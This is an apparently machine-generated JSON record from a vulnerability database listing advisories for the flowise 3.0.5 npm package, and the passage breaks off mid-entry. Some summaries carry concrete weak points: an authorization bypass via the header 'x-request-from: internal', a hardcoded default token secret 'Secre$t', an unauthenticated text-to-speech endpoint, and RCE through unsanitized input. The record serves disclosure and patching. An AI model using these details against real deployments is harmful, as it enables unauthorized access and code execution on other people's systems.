Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/34083?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/34083?format=api", "purl": "pkg:npm/flowise@3.0.5", "type": "npm", "namespace": "", "name": "flowise", "version": "3.0.5", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "3.1.0", "latest_non_vulnerable_version": "3.1.2", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80675?format=api", "vulnerability_id": "VCID-14af-nhf3-aqba", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Mass Assignment vulnerability in the DocumentStore creation endpoint allows authenticated users to control the primary key (id) and internal state fields of DocumentStore entities. Because the service uses repository.save() with a client-supplied primary key, the POST create endpoint behaves as an implicit UPSERT operation. This enables overwriting existing DocumentStore objects. In multi-workspace or multi-tenant deployments, this can lead to cross-workspace object takeover and broken object-level authorization (IDOR), allowing an attacker to reassign or modify DocumentStore objects belonging to other workspaces. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41277", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00321", "scoring_system": "epss", "scoring_elements": "0.55521", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41277" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41277", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41277" }, { "reference_url": "https://github.com/advisories/GHSA-3prp-9gf7-4rxx", "reference_id": "GHSA-3prp-9gf7-4rxx", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3prp-9gf7-4rxx" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3prp-9gf7-4rxx", "reference_id": "GHSA-3prp-9gf7-4rxx", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-25T01:31:25Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3prp-9gf7-4rxx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41277", "GHSA-3prp-9gf7-4rxx" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-14af-nhf3-aqba" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359768?format=api", "vulnerability_id": "VCID-17k4-psgt-sydg", "summary": "Flowise: Weak Default Token Hash Secret\n**Detection Method:** Kolega.dev Deep Code Scan\n\n| Attribute | Value |\n|---|---|\n| Location | packages/server/src/enterprise/utils/tempTokenUtils.ts:31-34 |\n| Practical Exploitability | Medium |\n| Developer Approver | faizan@kolega.ai |\n\n### Description\nThe encryption key for token encryption has a weak default value 'Secre$t' when TOKEN_HASH_SECRET environment variable is not set.\n\n### Affected Code\n```\nconst key = crypto\n .createHash('sha256')\n .update(process.env.TOKEN_HASH_SECRET || 'Secre$t')\n .digest()\n```\n\n### Evidence\nThe default value 'Secre$t' is hardcoded in the source code and is cryptographically weak. This key is used to encrypt user IDs and workspace IDs in JWT tokens.\n\n### Impact\nToken forgery - attackers can decrypt and manipulate encrypted token metadata, potentially changing user IDs or workspace IDs to escalate privileges or access unauthorized data.\n\n### Recommendation\nRequire TOKEN_HASH_SECRET to be set as a strong random value in environment variables. Throw an error on startup if not configured. Use a minimum of 32 bytes of entropy.\n\n### Notes\nThe TOKEN_HASH_SECRET has a weak hardcoded default 'Secre$t' (lines 31-34 and 50-53). This secret is used to derive an AES-256-CBC encryption key for encrypting sensitive metadata (user ID and workspace ID) embedded in JWT tokens via encryptToken() called at line 394 of passport/index.ts. If TOKEN_HASH_SECRET is not configured, an attacker knowing the default can decrypt the 'meta' field in JWTs to extract user IDs and workspace IDs. While this alone doesn't grant access (the JWT signature is separate), it leaks internal identifiers that could aid other attacks. The .env.example shows '# TOKEN_HASH_SECRET='popcorn'' - another weak value, and it's commented out suggesting it's optional. The application should require this secret to be explicitly set with a strong random value.", "references": [ { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-m7mq-85xj-9x33", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-m7mq-85xj-9x33" }, { "reference_url": "https://github.com/advisories/GHSA-m7mq-85xj-9x33", "reference_id": "GHSA-m7mq-85xj-9x33", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-m7mq-85xj-9x33" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "GHSA-m7mq-85xj-9x33" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-17k4-psgt-sydg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/65503?format=api", "vulnerability_id": "VCID-19jc-umg6-v7ce", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, multiple tool implementations directly import and invoke raw HTTP clients (node-fetch, axios) instead of using the secured wrapper. These tools include (1) OpenAPIToolkit/OpenAPIToolkit.ts, (2) WebScraperTool/WebScraperTool.ts, (3) MCP/core.ts, and (4) Arxiv/core.ts. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43995", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00066", "scoring_system": "epss", "scoring_elements": "0.20656", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43995" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43995", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43995" }, { "reference_url": "https://github.com/advisories/GHSA-qqvm-66q4-vf5c", "reference_id": "GHSA-qqvm-66q4-vf5c", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qqvm-66q4-vf5c" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-qqvm-66q4-vf5c", "reference_id": "GHSA-qqvm-66q4-vf5c", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:19:54Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-qqvm-66q4-vf5c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-43995", "GHSA-qqvm-66q4-vf5c" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-19jc-umg6-v7ce" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80896?format=api", "vulnerability_id": "VCID-1xfp-4rtg-4bcu", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, there is a remote code execution vulnerability in AirtableAgent.ts caused by lack of input verification when using Pandas. The user’s input is directly applied to the question parameter within the prompt template and it is reflected to the Python code without any sanitization. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41138", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00575", "scoring_system": "epss", "scoring_elements": "0.69236", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41138" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41138", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41138" }, { "reference_url": "https://github.com/advisories/GHSA-f228-chmx-v6j6", "reference_id": "GHSA-f228-chmx-v6j6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f228-chmx-v6j6" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-f228-chmx-v6j6", "reference_id": "GHSA-f228-chmx-v6j6", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T14:18:47Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-f228-chmx-v6j6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41138", "GHSA-f228-chmx-v6j6" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1xfp-4rtg-4bcu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/118629?format=api", "vulnerability_id": "VCID-39aw-3gc6-bkgb", "summary": "Flowise before 3.0.5 allows XSS via an IFRAME element when an admin views the chat log.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-50538", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.27496", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-50538" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/commit/9a06a85a8ddcbaeca1342827a5fea9087a587d97", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/commit/9a06a85a8ddcbaeca1342827a5fea9087a587d97" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/pull/4905", "reference_id": "4905", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" }, { "value": "9.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:53:34Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/pull/4905" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50538", "reference_id": "CVE-2025-50538", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50538" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.5", "reference_id": "flowise%403.0.5", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" }, { "value": "9.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:53:34Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.5" }, { "reference_url": "https://github.com/advisories/GHSA-964p-j4gg-mhwc", "reference_id": "GHSA-964p-j4gg-mhwc", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-964p-j4gg-mhwc" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc", "reference_id": "GHSA-964p-j4gg-mhwc", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" }, { "value": "9.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:53:34Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34082?format=api", "purl": "pkg:npm/flowise@3.0.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8" } ], "aliases": [ "CVE-2025-50538", "GHSA-964p-j4gg-mhwc" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-39aw-3gc6-bkgb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80784?format=api", "vulnerability_id": "VCID-3gp6-wwtd-kkf1", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the text-to-speech generation endpoint (POST /api/v1/text-to-speech/generate) is whitelisted (no auth) and accepts a credentialId directly in the request body. When called without a chatflowId, the endpoint uses the provided credentialId to decrypt the stored credential (e.g., OpenAI or ElevenLabs API key) and generate speech. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41279", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00124", "scoring_system": "epss", "scoring_elements": "0.31174", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41279" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41279", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41279" }, { "reference_url": "https://github.com/advisories/GHSA-5fw2-mwhh-9947", "reference_id": "GHSA-5fw2-mwhh-9947", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5fw2-mwhh-9947" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5fw2-mwhh-9947", "reference_id": "GHSA-5fw2-mwhh-9947", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T20:17:43Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5fw2-mwhh-9947" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41279", "GHSA-5fw2-mwhh-9947" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3gp6-wwtd-kkf1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/66503?format=api", "vulnerability_id": "VCID-488c-vrqu-f7hf", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, Flowise trusts any HTTP client that sets the header x-request-from: internal, allowing an authenticated tenant session to bypass all /api/v1/** authorization checks. With only a browser cookie, a low-privilege tenant can invoke internal administration endpoints (API key management, credential stores, custom function execution, etc.), effectively escalating privilege. This issue has been patched in version 3.0.13.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30820", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00133", "scoring_system": "epss", "scoring_elements": "0.32393", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30820" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30820", "reference_id": "CVE-2026-30820", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30820" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13", "reference_id": "flowise%403.0.13", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:35:16Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13" }, { "reference_url": "https://github.com/advisories/GHSA-wvhq-wp8g-c7vq", "reference_id": "GHSA-wvhq-wp8g-c7vq", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wvhq-wp8g-c7vq" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wvhq-wp8g-c7vq", "reference_id": "GHSA-wvhq-wp8g-c7vq", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:35:16Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wvhq-wp8g-c7vq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api", "purl": "pkg:npm/flowise@3.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13" } ], "aliases": [ "CVE-2026-30820", "GHSA-wvhq-wp8g-c7vq" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-488c-vrqu-f7hf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/120860?format=api", "vulnerability_id": "VCID-5hdy-fsnn-qfgq", "summary": "Flowise through v3.0.4 is vulnerable to remote code execution via unsanitized evaluation of user input in the \"Supabase RPC Filter\" field.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57164", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00211", "scoring_system": "epss", "scoring_elements": "0.43694", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57164" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/blob/flowise%403.0.5/packages/components/nodes/vectorstores/Supabase/Supabase.ts#L237", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/blob/flowise%403.0.5/packages/components/nodes/vectorstores/Supabase/Supabase.ts#L237" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57164", "reference_id": "CVE-2025-57164", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57164" }, { "reference_url": "https://github.com/FlowiseAI/Flowise", "reference_id": "Flowise", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-10-17T19:30:36Z/" } ], "url": 